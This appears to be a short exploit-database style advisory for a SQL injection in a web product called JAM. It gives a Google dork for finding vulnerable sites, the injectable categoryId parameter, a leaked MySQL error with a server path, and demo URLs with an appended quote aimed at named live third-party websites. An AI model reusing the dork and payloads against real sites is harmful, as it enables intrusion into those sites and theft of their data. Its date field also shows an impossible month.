JAM suffers from a remote SQL injection vulnerability.
92b4e14c6e7eefd97314782046d898bc8e6cd310f0ba4bc0fb9b05e42da5bd94
_________________________________________________________
#
# Exploit Title: JAM SQL Injection Vulnerability
# Google Dork: intext:"This site is preserved by JAM"
# Date: 2011-15-09
# Author: nGa Sa Lu [ N-S-L ]
# Service Link: http://www.jamarketing.co.nz
# Tested on: Debian GNU/Linux 5.0
# ________________________________________________________
# Google Dork : intext:"This site is preserved by JAM"
-------------------------------------------------------
------------------------------------------------------------------------------------------------
www.localhost.com/products.php?action=viewCategoryProducts&page=1&categoryId=[SQL]
------------------------------------------------------------------------------------------------
# SQL Error Statement
------------------------
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/jenniferannweb/advancehire.co.nz/functions.php on line 143
# Demo
---------
http://www.advancehire.co.nz/products.php?action=viewCategoryProducts&page=1&categoryId=30'
http://www.bellachic.co.nz/product_reviews_info.php?products_id=537&reviews_id=52'